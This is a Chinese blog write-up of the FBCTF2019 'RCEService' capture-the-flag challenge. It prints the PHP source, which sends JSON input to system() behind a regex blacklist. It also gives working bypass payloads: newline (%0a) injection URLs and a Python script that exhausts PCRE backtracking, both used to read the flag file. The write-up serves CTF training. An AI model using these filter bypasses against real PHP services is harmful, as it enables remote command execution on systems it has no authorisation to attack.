[FBCTF2019]RCEService1

已于 2024-06-23 14:49:49 修改
阅读量428 收藏 1
点赞数 7
文章标签: python web安全 php
于 2024-06-23 14:46:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alwtj/article/details/139799301
版权

开始代码审计~

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
    $json = $_REQUEST['cmd'];

    if (!is_string($json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } else {
        echo 'Attempting to run command:<br/>';
        $cmd = json_decode($json, true)['cmd'];
        if ($cmd !== NULL) {
            system($cmd);
        } else {
            echo 'Invalid input';
        }
        echo '<br/><br/>';
    }
}

?>

1. putenv('PATH=/home/rceservice/jail');  配置了一个环境变量,所以我们输入系统命令的时候需要找到它的绝对路径比如/bin/cat .

2. is_string() 说明我们传入的value,必须是字符型.

3. preg_math(),我们需要绕过这个正则表达式,不过它真的好长.

4. json_decode(),说明我们传入的格式为json格式.

5. system(),我们可以通过传入系统命令来找出flag值.

 我们开始进行绕过preg_math()~

 我们可以通过两种姿势来绕过~

 1. %0a 绕过

知识点:

       1 " . "不会匹配换行符(%0a,\n),除非正则表达式后面添加了m(多行模式)选项,或者s选项,可以使 . 可以在单行模式下匹配换行符,如下.

<?php  
$json = "flag"; 
if (preg_match('/^.*(flag).*$/', $json)) { 
    echo 'Hacking attempt detected';  
}  
?>

只需要 $json="\nflag" 

        2 当%0a在末尾时,$似乎会忽略%0a,如下.

if(preg_math('/^flag$/',$_GET['a'])&&$_GET['a']!=='flag'){
    echo $flag;
}

只需传入 ?a=flag%a

开始构造payload~

?cmd={"cmd":"/bin/cat /home/rceservice/flag"%0a}%0a%0a
?cmd=%0a{"cmd":"/bin/cat /home/rceservice/flag"%0a}

2. PCRE回溯绕过

知识点:

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌 (leavesongs.com)

import requests

url='http://ffa3fe84-58c7-4980-bf07-b573c0c5dcdb.node5.buuoj.cn:81/'
data={
    'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","feng":"'+'a'*1000000+'"}'
}
r=requests.post(url=url,data=data).text
print(r)

        

        

alwtj
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[FBCTF2019]RCEService 1
plant1234的博客
09-30 718
首先打开题目根据测试发现用JSON格式可以命令执行:发现有正则匹配绕过。
[FBCTF2019]RCEService
shinygod的博客
04-10 745
知识点:json格式,GET传参上限,换行绕preg,超回溯上限绕preg 开头给了个框让我们输入json格式。 输入{“cmd”:“ls”}注意:json格式用双引号包裹起来 但cat的时候就报错了,{“cmd”:“cat index.php”},像其他tac,nl…都不行。 看了其他人的wp,这个虚空源码很迷,不知道咋过来的。 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $
BUU [FBCTF2019]RCEService
Jay17的博客
03-13 527
BUU [FBCTF2019]RCEService
BUUCTF-[FBCTF2019]RCEService&[0CTF 2016]piapiapia
weixin_44016181的博客
10-11 199
BUUCTF-[FBCTF2019]RCEService&[0CTF 2016]piapiapia,BUU两道web练习题的WP。
[FBCTF2019]RCEService_WP
Accompany的博客
01-30 302
分析 文章目录分析源码题解 Enter command as JSON: 这便是打开页面的提示了,需要提交命令以JSON的形式,所以在这里先了解一下JSON是什么 了解于此 简单来说形式如下:{名称:值} 检验成功,下来便是通过命令执行获取flag了 接着其实是想cat源码看一看,毕竟一个RCE肯定会有许多过滤,但不管怎样cat,以见过的绕过方式去尝试都是没有回显的,便去看了各位师傅的wp,都说是网上搜的源码,咱也不明白咋来的,就直接奉上吧 源码 <?php putenv('PATH=/ho
BUUCTF:[FBCTF2019]RCEService
../../../../../../../
06-23 647
打开界面 可以看见提示说要用JSON格式输入cmd中 先尝试一下 {"cmd":"ls"} 出现一个index.php文件 但是获取不到,题目也没有其他信息,然后发现原本题目是提供了源码的,去网上找了找 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacki
[FBCTF2019]RCEService 正则回溯
qq_54929891的博客
03-28 527
打开题目输入JSON类型的cmd后,尝试读取index.php的源代码,但是读取不出来,并且扫后台出来的/index以及/index/login也没有任何东西,实在不知道怎么做了,只能看一下别人的wp,发现别人以来都是审查源码,我就奇怪了,源码怎么弄来的,看了很多wp发现应该是比赛的时候直接给的源码,但是buu平台忘记加上了 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $jso..
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
03-05
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
NetScream(网络加速软件) v1.8.4.2014 官方正式版.zip
07-15
NetScream是一款优化你的modem连接速率的工具。NetScream能提高你的internet连接速度,NetScream官方正式版是目前市场上最佳的modem优化工具之一,能极好地提高你的modem的下载/上传速度。它非常易于使用,完全兼容...
图片滚动加载
07-12
1. **数据属性**:为图片元素添加一个数据属性,如"data-src",存储原始图片URL。 2. **滚动事件**:监听滚动事件,当图片进入视口时,获取该图片元素并更新它的`src`属性。 3. **性能优化**:为了避免频繁触发滚动...
feedblitz汉化操作平台
07-22
1. **邮件订阅管理**:用户可以通过Feedblitz创建订阅表单,嵌入到自己的网站或博客中,让访客可以轻松订阅更新。它还支持管理订阅者列表,包括验证电子邮件地址、处理退订请求等。 2. **RSS Feed自动发送**:当...
Ansys Zemax|场曲跟畸变图的前世今生
ueotek的博客
07-02 380
这里的y和z坐标和方向余弦是(Hx, Hy, Px, Py)=(X, X, 0 ,0)和(Hx, Hy, Px, Py)=(X, X, 0 ,0.001),在光线追迹像面的前一个平面的 z坐标和方向余弦。OpticStudio通过在X和Y方向(弧矢和子午方向)的傍轴光线追踪确定近轴图像平面的Z坐标,并测量该近轴焦平面与系统图像平面的Z坐标之间的距离。使用附件中的样本文件,近轴像面的全局Z坐标与视场0处的像面位置之差与场曲和畸变图中的的Tan Shift相同。近轴像面的定义是以下两个光线交点的全局Z坐标。
10.javaSE基础_JDBC编译程序(Driver+Statement+Connection+mysql数据库连接)
m0_61086522的博客
07-02 1212
JDBC是的缩写。它是Sun的Javasoft公司制定的Java数据库连接技术,是一套标准接口java.sql包中提供了JDBC API,通过它连接到各种数据库系统,编写访问数据库的程序。JDBC API不能直接访问数据库,它依赖于数据库厂商提供的JDBC Driver(JDBC驱动程序)
使用Python实现深度学习模型:序列建模与生成模型的博客教程
Echo_Wish的博客
07-02 1047
本文介绍了使用Python实现深度学习模型的序列建模和生成模型的步骤。我们详细说明了每个步骤,并提供了相应的代码示例。通过学习本文,您将能够使用Python构建和训练序列建模和生成模型,并生成新的序列数据。希望本文对您有所帮助!如果您有任何问题或建议,请随时提出。
Python进阶】函数的扩展
weixin_52854743的博客
07-06 541
python函数的补充,包括函数的嵌套调用、函数的变量作用域、多种参数、拆包和交换变量值、引用和匿名函数
Java高级重点知识点-19-Lambda
m0_72926194的博客
07-02 485
本文主要是讲解了如何使用lambda表达式来简介代码开发,同时讲解了函数式编程思想,该思想主要的是体现做什么,而不是怎么做。
制作爬取4399游戏名称软件
最新发布
fasdaegaw的博客
07-06 127
请求头={'User-Agent':'Mozilla/5.0 (Windows NT 10.0;网站源代码=requests.get(url=链接,headers=请求头).text #发送请求并且拿到网站源代码。class属性的结果=初始化.find(class_="tm_list") #class是关键字。li标签内容=class属性的结果.find_all('li') #list。链接='https://www.4399.com/' #网站链接。#发送请求并且拿到源代码。
并发编程面试题1
搬砖的小熊猫的博客
07-03 904
单例模式中的懒汉机制会有有序性问题。DCL(Double-Checked Locking)方式存在指令重排问题,可能导致NullPointerException。在Java编译时,JIT会优化指令顺序,提升执行效率。在CPU层面,也会对指令进行重新排序,提升执行效率。这种指令调整在特殊操作上可能会导致问题。
开源的CTF比赛平台有那些
03-25
1. CTFd (https://github.com/CTFd/CTFd) 2. PicoCTF platform (https://github.com/picoCTF/picoCTF-platform) 3. FBCTF (https://github.com/facebook/fbctf) 4. RootTheBox ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值